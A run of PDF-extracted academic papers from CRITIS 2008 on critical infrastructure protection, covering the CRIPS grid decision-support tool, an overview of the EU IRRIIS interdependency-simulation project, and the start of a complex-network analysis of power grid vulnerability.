CRIPS is scanning permanently the developments in the grid and thus CRIPS detected the changes made by Step 1 to 6. Let us assume, that CRIPS knows (via rules in the knowledge base) the criticality of this chain of events - e.g. as a result of a former exercise or as an experience of an already happened accident. CRIPS stops the cascade to a blackout after step 3, because the operator realized the assessment and the recommended decision (see Fig. 4). Switch off Line L70 (long name: P21h P13h) R After the realization of this decision, PSSSINCAL and CRIPS identify no further critical situation, a possible CRIPS message is shown in Fig. 5.
Fig. 5. Result of the Decision Support by CRIPS
With this “network related measure” - without further costs - the way to the point of no return has been interrupted. Note: In this example CRIPS repeats warnings for critical situations and the recommended decisions after every scanning step (range of seconds). This is characteric for decision support: The decision maker is not forced to realize the proposed decisions; the proposals are only a “support” for his decision making. A ranking of the “critical situations” in case of more than one identified critical situations will be realized.
130
6
C. Schwaegerl et al.
Application in Real Network Operating
It is assumed, that the use of simulation and planning systems like R PSSSINCAL is well known, so this chapter is focussed on the functionality of CRIPS. Furthermore there are many systems available on the market, which are/can be used in control centres to support the daily work. But the main R benefit of an integrated system PSSSINCAL - CRIPS is The physical analysis of a power network is combined with an assessment and with a decision support in case of critical situations. So the whole spectrum of the operating of power networks can be covered. The physical analysis of the network is completed by an automatic provision of the knowledge of experts, resulting form experience and lessons learned concerning the management of critical situations. A central problem of structuring the knowledge base is the answer of the question How to define critical situation? A simple definition via “current data of indicator components” is only one possibility. The documentation of already happened blackout shows, that a critical situation can not be seen in current network data, but a certain “history of these data” (the development of the current situation) has to be taken into account. The modelling of the knowledge and its subjects will be the task of a knowledge engineer. A rule structure (horn clauses) is described in Sect. 4.2, and prototypical experimentations support the thesis A modelling of the assessment and decision support problem by simple structured horn clauses is possible, which guarantees sure and consistent maintenances of the knowledge base. The functionality of CRIPS is working in the background, no special user interface is necessary: The results can easily be integrated into already existing monitoring screens. The scanning rules are permanently applied the data of the corresponding grid for assessment.
References 1. IRRIIS: Integrated Risk Reduction of Information-based Infrastructure Systems. 6th framework program, http://www.irriis.org R 2. PSSSINCAL system manual, description of the program, www.siemens.com/systemplanning (follow link software solutions) 3. Dellwing, H., Schmitz, W.: Expert system CRIPS: Support of Situation Assessment and Decision Making. In: Lopez, J., H¨ ammerli, B.M. (eds.) CRITIS 2007. LNCS, vol. 5141. Springer, Heidelberg (2008) 4. Russel, S., Norvig, P.: K¨ unstliche Intelligenz – Ein moderner Ansatz. Prentice-Hall, Englewood Cliffs (2004)
Information Modelling and Simulation in Large Dependent Critical Infrastructures – An Overview on the European Integrated Project IRRIIS R¨ udiger Klein Frunhofer IAIS, Schloss Birlinghoven, D-53757 Sankt Augustin, Germany {Ruediger.Klein}@IAIS.Fraunhofer.de
Abstract. IRRIIS (“Integrated Risk Reduction of Information-based Infrastructure Systems”) is a European Integrated Project started in February 2006 within the 6th Framework Programme and ending in July 2009. The aim of IRRIIS is to develop methodologies, models and tools for the analysis, simulation and improved management of dependent and interdependent Critical Infrastructures (CIs). Middleware Improved Technology (MIT) will provide new communication and information processing facilities in order to manage CI dependencies. This paper will give an overview of the IRRIIS project to outline these methodologies, models, and tools. Scenarios of depending CIs developed in IRRIIS are used to validate our approach and to demonstrate the usefulness of our results. Keywords: critical infrastructures, dependability, CI dependency, information models, federated simulation, simulation environment, improved CI communication and management.
1
Introduction
Critical infrastructures (CIs) are getting more and more complex. At the same time their dependencies and interdependencies grow. Interactions through direct connectivity, through policies and procedures, or simply as the result of geographical neighbourhood often create complex relationships, dependencies, and interdependencies that cross infrastructure boundaries. In the years to come the number, diversity, and importance of critical infrastructures as well as their dependencies will still increase. The EU Project “Integrated Risk Reduction of Information-based Infrastructure Systems” (IRRIIS) is a European Project within the 6th Framework [1]. It started in February 2006 with a duration of 3.5 years including 16 partners from nine European countries from industrial companies like Siemens, Telecom Italia,
Project coordinator of the EU Project IRRIIS.
R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 131–143, 2009. c Springer-Verlag Berlin Heidelberg 2009
132
R. Klein
Red Electrica, ACEA, and Alcatel-Lucent, research organisations like Fraunhofer, VTT, TNO, IABG, and ENEA, universities like City University London, ETH Z¨ urich, and Telecom Paris Tech, and SMEs like AIS Malta and Grupo AIA in Barcelona. Modelling and Simulation of Critical Infrastructures is of course not a new topic. For recent overviews on this subject see, for instance, [2,3,4]. The IRRIIS project has a clear focus on enhancing substantially the dependability of dependent large complex Critical Infrastructures (CIs) by introducing appropriate middleware based communication technologies between CIs. The key idea behind the IRRIIS project is the following: if CIs depend on each other, they have to be able to communicate with each other in order to manage these dependencies. The challenge is that these Critical Infrastructures are quite different in their structure, behaviour, and dependencies. Depending CIs form a network of networks. In order to provide valuable support for their management and control we have to describe this network of networks on an appropriate level of technical detail. The communication between depending CIs will allow us to use information from one CI to operate the depending CI. This will be facilitated by so-called Middleware Improved Technology (MIT) including a communication backbone and MIT add-on components to process information from/to depending CIs. In order to develop and optimise this information interchange, appropriate simulation techniques are needed. They have to provide the necessary modelling granularity and diversity in order to model and simulate the behaviour and control of large, complex, dependent, heterogeneous networks of networks. This is the second research focus of the IRRIIS project. It is closely related to MIT and enables its development. IRRIIS’ main objectives can be summarized as follows: – to determine a sound set of public and private sector requirements based upon scenarios and related data analysis; – to design, develop, integrate and test communication components suitable for preventing and limiting cascading effects as well as supporting recovery and service continuity in critical situations; – develop, integrate, and validate novel and advanced modelling and simulation tools integrated into a simulation environment for experiments and exercises; and – to validate the functions of the middleware communication (MIT) components using the simulation environment and the results of the scenario and data analysis. Because of their central importance and their typical dependencies electrical power infrastructures and their supporting telecommunication infrastructures are chosen as example test cases. The IRRIIS approach is based on the analysis of vulnerabilities of large complex CIs and on the knowledge CI stakeholders have acquired about management and control of their systems [5]. Novel types of ICT systems are tested and validated by applying the IRRIIS simulation environment for comprehensive experiments.
Information Modelling and Simulation
133
The IRRIIS project is a highly interdisciplinary effort. It brings researchers from quite different domains together: industrial stakeholders from power and telecommunication domains, experts in dependability analysis, and specialists in various modelling and simulation techniques. The challenge is to develop a coherent approach including methodological, modelling and simulation aspects. Scenarios and experiments are developed and used to validate and optimise the approach. This paper will give an overview of the results reached so far within this project. We start with an overview on methodological issues relevant for dependency modelling and management of Critical Infrastructures (section 2). The models used in IRRIIS are summarized in secion 3. The SimCIP simulation tool developed in the IRRIIS project for the simulation of Critical Infrastructure dependencies is outlined in section 4. Section 5 contains a brief introduction to the MIT methods and tools created in our project. Section 6 is devoted to the scenarios used in IRRIIS, followed by a summary and outlook in Section 7.
2
The IRRIIS Methodology
Methodological work and empirical studies done in IRRIIS resulted in an increased understanding of dependencies and interdependencies between CIs [6]. Dependency is typically not an on/off relationship as most models up till now assume, but a relationship of qualities (e.g. pressure, biological contamination level) which have specific decay and restore behavior1 . These empirical studies underline the growing importance of CI dependencies. This improved understanding of CI dependencies provides the ground for our methodology, our modelling approaches, the tools developed, and the prepared scenarios and experiments. Fig. 1 shows a typical case for the methodology developed in IRRIIS which is also used as one of our test cases: the so-called Rome scenario (see also Section 6). Power and telecommunication systems are depending in this scenario on each other in different ways. Power networks have their own telecommunication networks connecting power components with SCADA control centres. In parallel, they use additional external telecommunication networks to avoid building expensive proprietary information infrastructures or simply as back-up systems to their own networks. The other way round is also of a very high relevance: telecommunication networks need electrical power typically coming from standard power networks. Hence, these power systems have to provide the needed energy to maintain their own back-up power systems which allow them to survive a certain amount of time till the standard energy sources work again. 1
Dependencies and Interdependencies: Analysis of empirical data on CI dependencies all over the world show that the mutual dependencies or interdependencies are seldom reported in the news and in CI disruption incident reports. Only three cases worldwide with interdependencies in over 1050 CI outage incidents with dependencies have been found [6].
134
R. Klein
Fig. 1. The example Rome scenario: it shows four power and telecommunication networks in Rome with some of their components and their dependencies
This is a typical case for CI dependencies. Networks provide and need services from each other. This can happen within the same domain (power-power, telecommunication-telecommunication), or between different domains (for instance power-telecommunication). Correspondingly, we address different types of dependencies: physical, cyber, logical, and geographic [7]. Today, the management and control of critical infrastructures depend to a large extend on information and communication technologies (ICT). They provide the “nerve systems” of these large infrastructures. There are highly sophisticated software systems allowing stakeholders to manage, control, and analyse their own systems under more or less every condition. What is frequently missing today is information about other systems the respective network depends on in one or the other way. But these dependencies are of growing importance: not just for dependability but also for economic efficiency. There are a number of reasons for the problems related to dependencies between CI. Every network is different. This is true for networks of the same domain (power, telecommunication, etc.), and of course also for CIs from different domains. Consequently, each network has its own approach to information management and control. – For a long time, Critical Infrastructures have been relatively stable and homogeneous. There was one national telecommunication network built over decades, and there was one national power transmission system with stable structures. Today, we encounter a growing diversity within these domains from a technical perspective and from an organisational/commercial one. – Information and communication techniques are key issues in this context today as enablers and as new risk factors. The World Wide Web, mobile and
Information Modelling and Simulation
135
IP based communication services, and the upcoming Web of Things build a ubiquitous ICT infrastructure which enables completely new approaches to manage Critical Infrastructures. It also generates new risk factors. A loss of communication within a CI may disable its function partially or completely. The ICT systems are highly interconnected Critical Infrastructures on their own with vulnerability against failures and attacks. The information systems currently used in critical infrastructures tend to be very different. There is no common modelling approach. The ICT systems used for the management and control of CI are highly sophisticated and highly adapted to the special needs of the respective network. The challenge for the IRRIIS project is to provide new approaches to information modelling, information processing and simulation as well as to communication between CIs which enables them to manage their dependencies.
3
Models in IRRIIS
In order to achieve the main goals of CI dependency analysis and management we need models which allow us to capture the essential aspects of Critical Infrastructure behaviours and their dependencies. This can be done on different levels of abstraction. In IRRIIS, we use two kinds of models: – Four different network analysis approaches (see Subsection 3.1) which abstract away many technical details of Critical Infrastructures and allow us to run complex simulations [8]: - the NAT approach; - the Preliminary Interdependency Analysis (PIA) with the M¨obius tool; - the Leontief approach; and - the bio inspired dynamic network analysis. – A more detailed technical modelling and simulation which allows us to describe depending Critical Infrastructures as a network of networks including the services they provide to each other, their logical dependencies, and the temporal aspects of their behaviours. This modelling approach, called the IRRIIS Information Model is described in more detail in Subsection 3.2 and in [9]. The simulation of IRRIIS Information models with the SimCIP simulation tool is outlined in Section 4. 3.1
Network Models in IRRIIS
To analyse the impact of dependencies on Critical Infrastructure operability a number of models within IRRIIS, at various levels of granularity, have been developed. These range from high-fidelity, scenario-specific models, used within the SimCIP simulation environment (see next subsection 3.2), to models based on services or the physical topology of networks. Within these boundaries there are a number of models, with various objectives, that have been applied. These
136
R. Klein
medium and low fidelity models, as a consequence of their level of abstraction, have some advantages; they allow us to study very large systems and the models take into account uncertainty inherent in analysing large scale Critical Infrastructure operation. Uncertainty in these systems may arise either from a lack of available system data or the complexity of these systems. In [9] we have classified these models, distinguishing between models that give generic and specific results. Within this section we shall briefly discuss these two types of models. Generic models give results that are applicable to a wide class of situations while specific models give results based on the functional and topological peculiarities of particular networks. Typically, the generic models are used to test hypotheses that depend on general properties of the modelled network while specific models help to either anticipate the behaviour, or assess the properties, of concrete systems. Generic models include Leontief-based model [10], Generic cascading model [10], common-mode failure model [11], and stationary/dynamic cascading models [11]. Specific models are either based on functional relationships between/within infrastructures or physical network-topologies. Functional models are employed in Preliminary Interdependency Analysis (PIA) [10]. Also, the Implementation-Service-Effect (ISE) [12] model is an example of a functionalbased model used within IRRIIS. Alternatively, a study of the evolution of the French power grid [11] uses models of specific physical network topologies. This is also the case for a stochastic analysis of interacting networks carried out within IRRIIS [10]. The results of these models are complimentary; service-based modelling provides information about dependencies that are different from modelling based on network topology. These, in turn, are complimentary to the detailed SimCIPbased models, which focus on simulating network operation under specific scenarios. Furthermore, some of these models may be used as part of an effort to validate MIT-related hypotheses (e.g., assumptions, made by the designers of an MIT component, about the long-run consequences of MIT in operation). 3.2
The IRRIIS Information Model
Many different kinds of information are relevant for CI dependency analysis, modelling, and simulation. Because dependencies exist between quite different systems, information exchange between them about critical situations, risks, vulnerabilities needs a system independent approach. Proprietary information approaches are not sufficient for this purpose. We need a generic information model as a reference model or lingua franca for communication between CIs [9, 13]. This reference model allows us to exchange information between different systems in a way that the meaning of this information is “understood” by all stakeholders and their ICT systems independent from the concrete kind of CI. In order to achieve the necessary granularity and precision of our models for detailed technical simulations and for the analysis of dependencies based on this simulation we need an expressive information model [9, 19, 20]. This information has to be processed in different kinds of ICT systems so we need models with clear semantics. For this purpose we build the IRRIIS Information Model on
Information Modelling and Simulation
137
semantic modelling techniques [14]. The IRRIIS Information Model can be seen as an ontology [15] of Critical Infrastructures and their dependencies [20]. It is described in detail within these proceedings [1a].
4
The SimCIP Simulation Tool
SimCIP (Simulator for C ritical I nfrastructure P rotection applications) is an agent-based simulation system based on the LAMPS (Language for Agent-based S imulation of P rocesses and S cenarios) language and the LAMPSYS agent simulation framework both developed at Fraunhofer IAIS [16, 17, 18]. It provides the main modelling and simulation platform for Critical Infrastructures and their dependencies. It allows us to simulate different scenarios on different CI models. The integrated MIT tools provide the communication capabilities between different Critical Infrastructures as one of the main goals of the IRRIIS project.
Fig. 2. SimCIP GUI
The IRRIIS Information Model (see Subsection 3.2) is implemented as a SimCIP model. This SimCIP modelling environment is completely agent based. CIs differ to a large extend in their structure, the types of components they have, their behaviours, etc. The agent based modelling and simulation capabilities of SimCIP enable us to model these quite different CIs in a coherent and transparent way. SimCIP comes with an sophisticated GUI (see fig. 3) and enables the user to create, edit, modify, copy, rename and delete agents as well as to functionally connect them to each other. These agents represent the components of critical infrastructures, their attributes and their behaviour. Agents belong to different types with different attributes and behaviours. Their connections can also be of different types allowing us to describe different kinds of dependencies. In this way SimCIP allows us to build complex network of network models of depending Critical Infrastructures within one SimCIP simulation model.
138
R. Klein
Fig. 3. Behaviour of an agent
Events allow us to trigger state changes of components (agents) from outside. These changes are propagated in the agent network and allow us to simulate the network behaviour. Events can be collected in complete scenarios where different events happen at defined points in time affecting various components in our network model. The behaviour of agents can be characterised by various temporal aspects: delays, declines, etc. (see fig. 3). The state of an agent can depend on states of related agents. A change of an agent’s state will be propagated according to these relationships within the network. This allows us to model complex Critical Infrastructures of quite different types including their dependencies. The simulation of network behaviour can include quite special algorithms (for instance, routing in telecommunication networks, or load distribution in power networks). It is not feasible to re-implement such special behaviours within SimCIP. By this reason SimCIP supports federated simulation: external special-purpose simulators can be integrated with SimCIP. In this way their simulation capabilities can be used within the overall simulations of SimCIP. The expressive IRRIIS Information Model providing the basis for SimCIP allows us to use a very flexible semantic approach to federated simulation.
5
Middleware Improved Technology
Middleware Improved Technology (MIT) is one of the key concepts behind IRRIIS. Today, Critical Infrastructures need highly sophisticated information and communication technologies for their management and control. But though we encounter a growing importance of dependencies from and to other Critical Infrastructures there is nothing comparable on the control level. MIT shall close this gap: by providing a sophisticated communication platform for exchange of information between Critical Infrastructures, and by providing appropriate MIT add-on components to manage this information.
Information Modelling and Simulation
139
The main MIT components developed in IRRIIS are – the MIT Communication Tool allowing different CI to exchange information (see Subsection 5.1); – the Risk Estimator (RE) which enables the operators of a Critical Infrastructure to process information from depending CI and to send critical information from its own network to depending CI (Subsection 5.2); and – the CRIPS decision support tool (“CRIsis management and Planning System”, see Subsection 5.3). – TEFS (Tools for Extraction of functional status) a simple data interface to SCADA and control systems, and – IKA (the Incident Knowledge Analyser2 ). All MIT components are integrated into the SimCIP simulation platform in order to enable experiments on scenarios. In this way we will validate how well they fit the needs of improved communication between depending Critical Infrastructures.
Fig. 4. Overview of the MIT Architecture: each Critical Infrastructure uses MIT addon components like Risk Estimator (RE), the decision support tool CRIPS, TEFS (Tools for Extraction of functional status), and IKA (Incident Knowledge Analyser)
5.1
The MIT Communication Tool
Communication between depending Critical Infrastructures is an essential element for improved dependency management and increased dependability. The MIT communication backbone was designed and implemented for this purpose. Each CI has its own interface to the backbone and is enabled to send and receive messages from/to depending CI (see fig. 6). The CI control centres can receive information through the mIT backbone from depending CI and process this information for their own purposes with the MIT add-on components like Risk Estimator, decision support tool CRIPS, etc. The information exchanged via the MIT communicator is based on the IRRIIS Information Model (see Subsection 3.2). It is represented in Risk Modelling Language (RML), an XML-shaped version of the IRRIIS Information Model supporting information exchange through Web services used in the MIT communication backbone [12]. 2
IKA will be described in a forthcoming publication.
140
5.2
R. Klein
The Risk Estimator
A key assumption for defining the risk estimator is that specific conditions within one CI may not be critical by themselves, but that they become critical in combination with other situations. Therefore, this MIT add-on component combines and analyses more information than only the information from its home CI (fig. 7). This MIT add-on component allows us to give approximated risk estimates by using a relatively simple rule-based approach. Estimations take into account: real-time information (internal assessment), status information from other depending CI, wide-area planning information, scheduled maintenance, weather forecast, strikes, major public events, software/hardware vulnerability and other public information resources. 5.3
The CRIPS Decision Support Tool
CRIPS (“CRIsis management and Planning System”) is an MIT add-on component aimed at supporting the assessment of the state of a CI and as a conclusion of this assessment at supporting the decision making in order to decrease a possible emergency situation.
Fig. 5. The Risk Estimator
The assessment of the current situation in a network e.g. in a power network - should be more precisely characterized as “strategic assessment” of the current situation: not a normal day-to-day problem is to be identified, but the aim is to identify a situation which can cause a wide-area failure of power supply. CRIPS is characterized as “knowledge based tool” and it is designed as an expert system: – Dependency structures with respect to a support of decision making can be formulated by “if-then-else-rules”, and the realization of an expert system to support a similar decision making problem in the political-military crisis management has proved the applicability of an such a representation and as consequence of an expert system for this task: It is the canonical method.
Information Modelling and Simulation
141
– The representation of knowledge is simple-structured and this is a characteristic quality of an expert system separated from the processing (inference). This guarantees especially the required easy maintenance of the knowledge base.
6
Scenarios and Experiments
In order to be as close as necessary to the behaviour of real Critical Infrastructures the models we can build and simulate in SimCIP can be quite complex. The temporal aspects of component behaviours, the logical and other dependencies between components, redundancies between services, etc. can be described with high precision. The result is that the emergent behaviour of such complex models can not easily be predicted. By this reason we can run experiments with our models where different scenarios can be applied to a model of depending CI. This allows us to analyse in a systematic way how models of depending CI behave under certain circumstances and how MIT components support the reduction of cascading failures. The first scenario created in the project is the (already mentioned) Rome scenario (see also fig. 1). It consists of four depending Critical Infrastructures: two from the power domain and two related ones from the telecommunication sector. This scenario forms a good playground for our experiments. It has been modelled using the IRRIIS Information Model and implemented within the SimCIP simulation environment. Siemens? Sincal power network simulator has been integrated with SimCIP in order to provide those aspects of power network simulation which are not directly facilitated by SimCIP3 . SimCIP enables the specification of scenarios as sequences of events and actions happening as part of the network simulation. An event triggers a state transition in one of the network components. If this component belongs to one of the power networks its state transition is propagated to the Sincal power network simulator. The states of all related power network components is calculated there and propagated back to SimCIP. SimCIP interprets all resulting states and classifies them according to some general classification rules. These classifications may trigger new events as transitions of states. Loss of power in a telecommunication component means activation of their back-up power systems. If this does not work either, or if after some time the back-up systems also fail the telecommunication component can not provide its service anymore. This lost service can have consequences for depending networks etc. The federated simulation of SimCIP with its fine-grained model of heterogeneous networks and its integrated external simulator(s) enables the creation of quite complex and realistic scenarios for the investigation of dependencies of Critical Infrastructures and for the assessment of the benefits of MIT components. 3
In a next step a telecommunication network simulator will also be integrated into SimCIP in order to enhance this aspect of dependency simulation.
142
7
R. Klein
Summary and Outlook
IRRIIS is an interdisciplinary project dedicated to the analysis, modelling, simulation, and improved operation of depending Critical Infrastructures. We analysed a couple of network analysis approaches for their contributions to the understanding of dependencies. In parallel we created the IRRIIS Information Model as lingua franca for communication between depending CI and as platform for CI simulation and analysis. The concept of Middleware Improved Technology (MIT) was created in IRRIIS in order to improve information sharing between depending CI. MIT components like the MIT communication backbone, the Risk Estimator, and the CRIPS decision support tool were implemented. The SimCIP simulation tool was developed as platform for CI simulations and for experiments with our MIT tools. It enables us to use IRRIIS Information Models for complex depending CI on the necessary level of technical precision. SimCIP supports federated simulation through the integration of external special purpose simulators. Scenarios allow us to investigate depending Critical Infrastructures and their emergent behaviour. We can validate through experiments with different scenarios how well our models and concepts fit the needs of improved CI management. IRRIIS will end in July 2009. The remaining month will be used to – improve and extend our modelling and simulation capabilities in order to enable users of our tools to build and simulate critical infrastructures and their dependencies; – to enhance the functionality of risk estimation and decision support including a tight integration into our simulation environment SimCIP; – to build new scenarios directed especially towards next generation Critical Infrastructures; – to run systematic experiments with the existing and the new scenarios in order to get a more comprehensive understanding of the emerging behaviour and of the benefits of MIT components; and – to disseminate our results to a broad audience in the academic community and especially to industry in order to guarantee a widespread usage of our results.
Acknowledgement The research described in this paper was partly funded by the EU commission within the 6th IST Framework Programme in the IRRIIS Integrated Project under contract No 027568. The authors thank all project partners for many interesting discussions which greatly helped to achieve the results described here.
References 1. The IRRIIS European Integrated Project, http://www.irriis.org; Klein, R., et al.: The IRRIIS Information Model. In: Setola, R., Geretshuber, S. (eds.) CRITIS 2008. LNCS, vol. 5508. Springer, Heidelberg (2009)
Information Modelling and Simulation
143
2. Pederson, P., et al.: Critical Infrastructure Interdependency Modeling: A Survey of U.S. and International Research, Technical Report, Idaho National Lab (August 2006) 3. H¨ ammerli, B.M. (ed.): CRITIS 2007. LNCS, vol. 5141. Springer, Heidelberg (2007) 4. Kr¨ oger, W.: Reliability Engineering and System Safety. Reliability Engineering and System Safety 93, 1781–1787 (2008) 5. Beyer, U., Flentge, F.: Towards a Holistic Metamodel for Systems of Critical Infrastructures. In: ECN CIIP Newsletter (October/November 2006) 6. Nieuwenhuijs, A.H., Luiijf, H.A.M., Klaver, M.H.A.: Modeling Critical Infrastructure Dependencies. In: Shenoi, S. (ed.) IFIP International Federation for Information Processing, Critical Infrastructure Protection, Boston. Springer, Heidelberg (2008) (to appear) 7. Rinaldi, S., Peerenboom, J., Kelly, T.: Identifying, Understanding, and Analyzing Critical Infrastructure Interdependencies. IEEE Control Systems Magazine, 11–25 (December 2001) 8. Bloomfield, R., Popov, P., Salako, K., Wright, D., Buzna, L., Ciancamerla, E., Di Blasi, S., Minichino, M., Rosato, V.: Analysis of Critical Infrastructure dependence – An IRRIIS perspective. In: Klein, R. (ed.) Proc. IRRIIS Workshop at CRITIS 2008, Frascati, Italy (October 2008) 9. Klein, R., et al.: The IRRIIS Information Model. In: Proc. CRITIS 2008, Frascati, Italy. LNCS. Springer, Heidelberg (2008) 10. Minichino, M., et al.: Tools and techniques for interdependency analysis, Deliverable D2.2.2, The IRRIIS Consortium (July 2007), http://www.irriis.org 11. IRRIIS deliverable D2.1.2, Final report on analysis and modelling of LCCI topology, vulnerability and decentralised recovery strategies, The IRRIIS Consortium, http://www.irriis.org/2007 12. Flentge, F., Beyel, C., Rome, E.: Towards a standardised cross-sector information exchange on present risk factors. In: H¨ ammerli, B.M. (ed.) CRITIS 2007. LNCS, vol. 5141, pp. 369–380. Springer, Heidelberg (2008) 13. Rathnam, T.: Using Ontologies To Support Interoperabilit In Federated Simulation, M.Sc. thesis, Georgia Institute of Technology, Atlanta, GA, USA (August 2004) 14. Staab, S., Studer, R. (eds.): Handbook on Ontologies. International Handbooks on Information Systems. Springer, Heidelberg (2004) 15. Gruber, T.: Toward Principles for the Design of Ontologies Used for Knowledge Sharing. In: Proceedings of the International Workshop on Formal Ontology, Padova, Italy (March 1993) 16. Beyel, C., et al.: SimCIP Functional specification, Deliverable D.2.3.1., The IRRIIS Consortium (March 2007), http://www.irriis.org 17. Beyel, C., et al.: SimCIP Architecture, Deliverable D.2.3.2., The IRRIIS Consortium (March 2007), http://www.irriis.org 18. Beyel, C., et al.: SimCIP Simulation environment, Deliverable D.2.3.7. The IRRIIS Consortium (August 2008), http://www.irriis.org 19. Annoni, A.: Orchestra: Developing a Unified Open Architecture for Risk Management Applications. In: van Oosterom, P., et al. (eds.) Geo-information for Disaster Management. Springer, Heidelberg (2005) 20. Min, H.J., Beyeler, W., Brown, T., Son, Y.J., Jones, A.T.: Toward modeling and simulation of critical national infrastructure interdependencies. IIE Transactions 39, 57–71 (2007)
Assessment of Structural Vulnerability for Power Grids by Network Performance Based on Complex Networks Ettore Bompard1, Marcelo Masera2 , Roberto Napoli1 , and Fei Xue1 1
Department of Electrical Engineering, Politecnico di Torino, Corso Duca degli Abruzzi 24, I-10129 Torino, Italy {ettore.bompard}@polito.it, {roberto.napoli}@polito.it, {fei.xue}@polito.it 2 Institute for the Protection and Security of the Citizen Joint Research Centre - European Commission T.P. 210 I-21020 Ispra (VA), Italy {marcelo.masera}@jrc.it
Abstract. Power grids have been widely acknowledged as complex networks (CN) since this theory emerged and received considerable attention recently. Many works have been performed to investigate the structural vulnerability of power grids from the topological point of view based on CN. However, most of them applied conceptions and measurements of CN directly to the analysis of power grids which have more specific features that can not be reflected in generic perspective. This paper proposes several most serious obstacles for applying CN to analysis of vulnerability for power grids. Based on the proposed solutions for these obstacles, specific concept of network performance to indicate power supply ability of the network will be defined. Furthermore, the proposed method will be investigated by a 34-bus test system in comparison with the result from general concept of efficiency in CN to indicate its effectiveness.
1 Introduction A vast number of hazards threaten public facilities both due to accidental reasons and intentional attacks; both of them may have disastrous social and economic effects. Among public facilities, the infrastructural systems for electric power delivery have a particular importance, since they are widely distributed and indispensable to modern society. Outages of power systems may have severe impacts on a country in many respects [1]. Meanwhile, the catastrophic consequences of blackouts have indicated possible threats from terrorism attacks to exploit the vulnerabilities of power systems. This has attracted many scientists to make lots of works in this field [2][3]. However, these works are mostly based on classical and detailed physical models which need complete information and data of system operation. On the contrary, as the complex features of the security problem and the complicated influence of power market caused by deregulation, neither attackers nor defenders have enough abilities to predict the exact system operating states before the attacks are really preformed. Especially for attackers, it would be very difficult to get complete information to make detail physical model and make decision-making. Therefore, the problem of malicious threat would be analyzed from statistical and general perspective where CN has dominances [4]. R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 144–154, 2009. c Springer-Verlag Berlin Heidelberg 2009
Assessment of Structural Vulnerability for Power Grids
145
Complex networks have received considerable attention recently since the investigation of small-world [5] and the characterization of scale-free [6] have been discovered in many real networks. Since power grids have been widely acknowledged as a typical type of CN, many works have applied concepts and measurements of CN to analyze the structural vulnerabilities [4][7][8][9] or the mechanism of cascading failure[10][11][12] in power grids. However, the theory of CN has developed most from the generic physical perspective which focuses on the common features of all interested networks and common concepts and measurements. In contrast, the functions and physical rules of different networks would be totally different and take many specific characteristics that can not be dealt with by general methodologies. When the theory of CN is gradually applied to some fields involving the specific features of networks, such as the protection of networked infrastructures, it is unavoidable to adapt the common concepts and measurements according to the considered scenarios. In this paper, based on reconsidering some former works applying general theory of CN to analysis of power grids vulnerabilities, several serious obstacles which are crucial for analyzing structural vulnerabilities of power grids in CN will be proposed. Furthermore, some solutions according to the professional knowledge of power system engineering to these obstacles will be presented to define global network performance for power grids for security analysis of power systems. The proposed method will be applied to a 34-bus test system to find the most vulnerable line in contrast to the result from other former methods of general CN theory to prove its effectiveness. The next section will propose those serious obstacles to be specially considered to apply CN to topological analysis of power grids vulnerabilities. Section 3 will propose solutions according to power system engineering to these obstacles and define the global network performance of power grids. In section 4, analysis of security and vulnerability based on these propositions will be performed on a 34-bus system to find out the most vulnerable line. Conclusions will be drawn in section 5.
2 Several Main Obstacles for Application of CN to Analysis of Power Grids 2.1 Paths and Their Contributions The concept of length of path is the basic factor of CN theory where it has been defined as the number of edges along the path. This is important since it relates to the identification of the shortest path and calculation of betweenness or evaluation of network performance [4][7][8][9]. From the perspective of power engineering, length?of a path should reflect the difficulty or cost to transfer power flow between two nodes along the path. In power grid, the difficulty or obstacle for transmission of electricity is described by the impedance of the transmission lines which can be considered as electrical distance? From this point of view, the number of lines can not give meaningful indication for electrical power engineering. Furthermore, another problem and also the most unrealistic assumption relates to paths in definition of betweenness [4] [12] and efficiency [8] is that the power is routed
146
E. Bompard et al.
through the shortest or the most efficient paths and the other paths have not been considered. However, in power grids, the transmission of power in network is completely determined by physical rules. As well known in power engineering, the power transmission between two nodes would involve many different existent paths to different extents. This is an inherent feature depending on the network structure and can be reflected by the Power Transmission Distribution Factors (PTDF). PTDF is a matrix that reflects the sensitivity of the power flow on the lines to the change in the injection power of buses. For a network with N nodes and Y lines, the matrix of PTDF with node j as the reference bus can be written as ⎛ ⎞ a11 a12 · · · a1N ⎜ a21 a22 · · · a2N ⎟ ⎜ ⎟ A=⎜ . . . (1) . ⎟ ⎝ .. .. . . .. ⎠ aY 1 aY 2 · · · aY N For each column A.i ( j) = [a1i , a2i , . . . , aYi ], the values can be calculated by supposing that only one unit of power is injected from node i and one unit power is consumed at reference node j, the result of DC power flow on line l is just the value of ali (l = 1, 2, . . . ,Y ). 2.2 Load and Betweenness The load through a node or edge is a critical conception in research of cascading failure in power grids [11][12] or assessment of importance of the component [4]. However, the load of a node or edge in these works according to the general theory of CN is defined equally to the concept of betweenness which was defined as the number of shortest paths traversing that component. Besides the assumption of shortest path we have mentioned above, this concept can not be accepted directly for power grids for following two reasons. Firstly, the paths between nodes or the capacity of the transmission paths should not make confusion with the real power load transmitted in the paths. Secondly, the network model in general theory of CN is unweighted and undirected. The identification of possible paths connecting two nodes is based on graph theory where transmission lines are assumed bidirectional [7]. As PTDF has signed feature, some paths in undirected model may not valid in the directed power transmission networks. Therefore, the calculation of betweenness or identification of shortest path in general theory of CN for power grids may take into account some paths which are unmeaning for power transmission and impact the results seriously. 2.3 Heterogeneity of Components In general or preliminary research, to avoid those difficulties involved in their differentiation and dynamical behavior characterization, all elements have been treated identically [4]. However, in reference [8][9][13], this idea was directly applied to power grids where the situation may be very different. The buses in the grid may have different functions in energy transmission. Generally, we can classify the buses in power transmission networks as generation buses Gg , transmission buses Gt and distribution buses
Assessment of Structural Vulnerability for Power Grids
147
Gd . Only the generation buses should be considered as source nodes and only distribution buses should be considered as destination nodes. Therefore, as assumed in [4][11], the analysis of power grids relating to power supply behaviors by CN should only take into account the power transmission between all generator buses and all distribution substations. For the components with same functions, their differences on some quantified features would also impact network behaviors. In former performed analysis of power grids by CN with unweighted models, the impacts of these features have not been properly assessed. For example, in the calculation of betweenness [4] or efficiency [8], the path between each considered pair of nodes contributes equally to the evaluation of the considered measurement. In fact, for the loads on the same bus, the paths connecting to different generators have different length and capacity, these will undoubtedly cause different power supply ability to this load bus.
